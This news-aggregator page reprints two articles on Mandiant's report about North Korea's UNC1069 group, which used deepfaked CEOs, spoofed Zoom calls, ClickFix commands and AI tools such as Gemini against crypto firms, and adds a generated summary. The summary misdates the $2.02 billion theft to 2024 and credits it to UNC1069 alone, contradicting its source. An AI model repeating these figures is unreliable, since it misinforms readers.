2 Sources
2 Sources
[1]
Google Warns of AI-Powered North Korean Malware Campaign Targeting Crypto, DeFi - Decrypt
Experts warn that trusted digital identities are becoming the weakest link. Google's security team at Mandiant has warned that North Korean hackers are incorporating artificial intelligence-generated deepfakes into fake video meetings as part of increasingly sophisticated attacks against crypto companies, according to a report released Monday. Mandiant said it recently investigated an intrusion at a fintech company that it attributes to UNC1069, or "CryptoCore", a threat actor linked with high confidence to North Korea. The attack used a compromised Telegram account, a spoofed Zoom meeting, and a so-called ClickFix technique to trick the victim into running malicious commands. Investigators also found evidence that AI-generated video was used to deceive the target during the fake meeting. "Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives," the report said. The warning comes as North Korea's cryptocurrency thefts continue to grow in scale. In mid-December, blockchain analytics firm Chainalysis said North Korean hackers stole $2.02 billion in cryptocurrency in 2025, a 51% increase from the year before. The total amount stolen by DPRK-linked actors now stands at roughly $6.75 billion, even as the number of attacks has declined. The findings highlight a broader shift in how state-linked cybercriminals are operating. Rather than relying on mass phishing campaigns, CryptoCore and similar groups are focusing on highly tailored attacks that exploit trust in routine digital interactions, such as calendar invites and video calls. In this way, North Korea is achieving larger thefts through fewer, more targeted incidents. According to Mandiant, the attack began when the victim was contacted on Telegram by what appeared to be a known cryptocurrency executive whose account had already been compromised. After building rapport, the attacker sent a Calendly link for a 30-minute meeting that directed the victim to a fake Zoom call hosted on the group's own infrastructure. During the call, the victim reported seeing what appeared to be a deepfake video of a well-known crypto CEO. Once the meeting began, the attackers claimed there were audio problems and instructed the victim to run "troubleshooting" commands, a ClickFix technique that ultimately triggered the malware infection. Forensic analysis later identified seven distinct malware families on the victim's system, deployed in an apparent attempt to harvest credentials, browser data and session tokens for financial theft and future impersonation. Fraser Edwards, co-founder and CEO of decentralized identity firm cheqd, said the attack reflects a pattern he is seeing repeatedly against people whose jobs depend on remote meetings and rapid coordination. "The effectiveness of this approach comes from how little has to look unusual," Edwards said. "The sender is familiar. The meeting format is routine. There is no malware attachment or obvious exploit. Trust is leveraged before any technical defence has a chance to intervene." Edwards said deepfake video is typically introduced at escalation points, such as live calls, where seeing a familiar face can override doubts created by unexpected requests or technical issues. "Seeing what appears to be a real person on camera is often enough to override doubt created by an unexpected request or technical issue. The goal is not prolonged interaction, but just enough realism to move the victim to the next step," he said. He added that AI is now being used to support impersonation outside of live calls. "It is used to draft messages, correct tone of voice, and mirror the way someone normally communicates with colleagues or friends. That makes routine messages harder to question and reduces the chance that a recipient pauses long enough to verify the interaction," he explained. Edwards warned the risk will increase as AI agents are introduced into everyday communication and decision-making. "Agents can send messages, schedule calls, and act on behalf of users at machine speed. If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process," he said. It's "unrealistic" to expect most users to know how to spot a deepfake, Edwards said, adding that, "The answer is not asking users to pay closer attention, but building systems that protect them by default. That means improving how authenticity is signalled and verified, so users can quickly understand whether content is real, synthetic, or unverified without relying on instinct, familiarity, or manual investigation."
[2]
AI-assisted hacking group hits targets with a complicated 'social engineering' scam that involves deepfaked CEOs, spoofed Zoom calls and a malicious troubleshooting program
This is one of many scams made in tandem with AI tools right now. A hacking group reportedly based out of North Korea has come up with a "new tooling and AI-enabled social engineering" scam, according to Google, and it's pretty complicated. Effectively, it uses a hacked account to send a Zoom link via a calendar invite to an uncompromised account. That version of Zoom is, in fact, a spoof, and what targets are met with is a deepfaked version of the account owner. Google's report notes that a version of this deepfake takes the form "of a CEO from another cryptocurrency company." Once in the meeting, the deepfaked user claims to have technical issues and directs the target on how to troubleshoot their PC. The troubleshooting prompt leads them to run an infected string of commands that then unleashes a series of backdoors and data miners on the victim's PC. Google calls it "AI-enabled social engineering" and notes 7 new malware families used in the attack. UNC1069 are the actors Google has identified as being behind the scam. They have reportedly been active since 2018 and were found to have been using Gemini last year to "develop code to steal cryptocurrency, as well as to craft fraudulent instructions impersonating a software update to extract user credentials". Google says UNC1069 is "employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives." This hack needs access to an account to start in the first place, so Google notes further attacks have "a dual purpose; enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging victim's identity and data." Though Google states that the account linked to the group has been terminated, Gemini was used at some point "to develop tooling, conduct operational research, and assist during the reconnaissance stages." Gemini is not the only AI tool being used in similar cybercrimes. Antivirus creator and cybersecurity company Kaspersky claims hacking group BlueNoroff is using GPT-4o to enhance images to convince targets. As AI gets more impressive and complicated, so too will the scams to accompany it. One can only hope that anti-scam measures become equally clever.
Share
Share
Copy Link
Google's Mandiant security team has exposed a sophisticated North Korean malware campaign using AI-generated deepfakes and spoofed Zoom calls to target cryptocurrency companies. The UNC1069 group, also known as CryptoCore, stole $2.02 billion in 2024 alone—a 51% increase from the previous year. These AI-enabled social engineering attacks exploit digital trust through fake video meetings with deepfaked CEOs, marking a dangerous evolution in cybercrime.
Google's security team at Mandiant has issued an urgent warning about North Korean malware campaigns that leverage AI-generated deepfakes to target cryptocurrency companies and DeFi platforms
1
. The threat actor, identified as UNC1069 or CryptoCore, has evolved its tactics to include AI-enabled social engineering that exploits trust in routine digital interactions1
. According to the Monday report, these attacks represent a significant shift from mass phishing campaigns to highly tailored operations targeting cryptocurrency companies, venture capital firms, and their executives1
.
Source: Decrypt
The scale of North Korean malware operations has reached alarming levels. Blockchain analytics firm Chainalysis reported that North Korean hackers stole $2.02 billion in cryptocurrency in 2024, representing a 51% increase from the previous year
1
. The total amount stolen by DPRK-linked actors now stands at roughly $6.75 billion, even as the number of attacks has declined1
. This pattern reveals that North Korea is achieving larger cryptocurrency theft through fewer, more targeted incidents that bypass traditional cybersecurity defenses.Mandiant's investigation into a recent fintech company intrusion revealed the sophisticated mechanics of these AI-powered attacks
1
. The attack begins when victims receive contact via Telegram from what appears to be a known cryptocurrency executive whose account has already been compromised1
. After building rapport, the attacker sends a Calendly link directing victims to spoofed Zoom calls hosted on the group's own infrastructure1
. During these fake video meetings, victims encounter deepfake video of well-known crypto CEOs1
2
.Once the meeting begins, attackers claim audio problems and instruct victims to run a malicious troubleshooting program using the ClickFix technique
1
2
. This triggers malware infection, with forensic analysis identifying seven distinct malware families designed to harvest user credentials, browser data, and session tokens for financial theft and future impersonation1
2
.
Source: PC Gamer
Fraser Edwards, co-founder and CEO of decentralized identity firm cheqd, explained that these attacks target professionals whose jobs depend on remote meetings and rapid coordination
1
. "The effectiveness of this approach comes from how little has to look unusual. The sender is familiar. The meeting format is routine. There is no malware attachment or obvious exploit. Trust is leveraged before any technical defence has a chance to intervene," Edwards said1
. This digital trust exploitation represents a fundamental shift in cybercrime tactics, where social engineering bypasses traditional security measures.Related Stories
Google's report reveals that UNC1069, active since 2018, has been using Gemini to develop code for cryptocurrency theft and craft fraudulent instructions impersonating software updates to extract user credentials
2
. The AI tool was also employed "to develop tooling, conduct operational research, and assist during the reconnaissance stages"2
. Gemini is not the only AI tool being weaponized—cybersecurity company Kaspersky claims hacking group BlueNoroff is using GPT-4o to enhance images to convince targets2
.Edwards warned that AI is now being used beyond live calls to draft messages, correct tone of voice, and mirror normal communication patterns, making routine messages harder to question
1
. He added that the risk will escalate as AI agents are introduced into everyday communication: "Agents can send messages, schedule calls, and act on behalf of users at machine speed. If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process"1
.Mandiant observed that these attacks serve a dual purpose: enabling immediate cryptocurrency theft while fueling future social engineering campaigns by leveraging victims' identity and data
2
. This creates a compounding threat where each successful breach enables more convincing subsequent attacks. Edwards emphasized that expecting users to spot deepfakes is "unrealistic," stating: "The answer is not asking users to pay closer attention, but building systems that protect them by default. That means improving how authenticity is signalled and verified, so users can quickly understand whether content is real, synthetic, or unverified without relying on instinct, familiarity, or manual investigation"1
. As AI-powered attacks grow more sophisticated, the crypto industry faces an urgent need to implement verification systems that can counter scalable impersonation attacks before digital trust becomes an insurmountable vulnerability in DeFi and broader cybersecurity infrastructure.Summarized by
Navi
[1]
1
Policy and Regulation

2
Technology

3
Technology
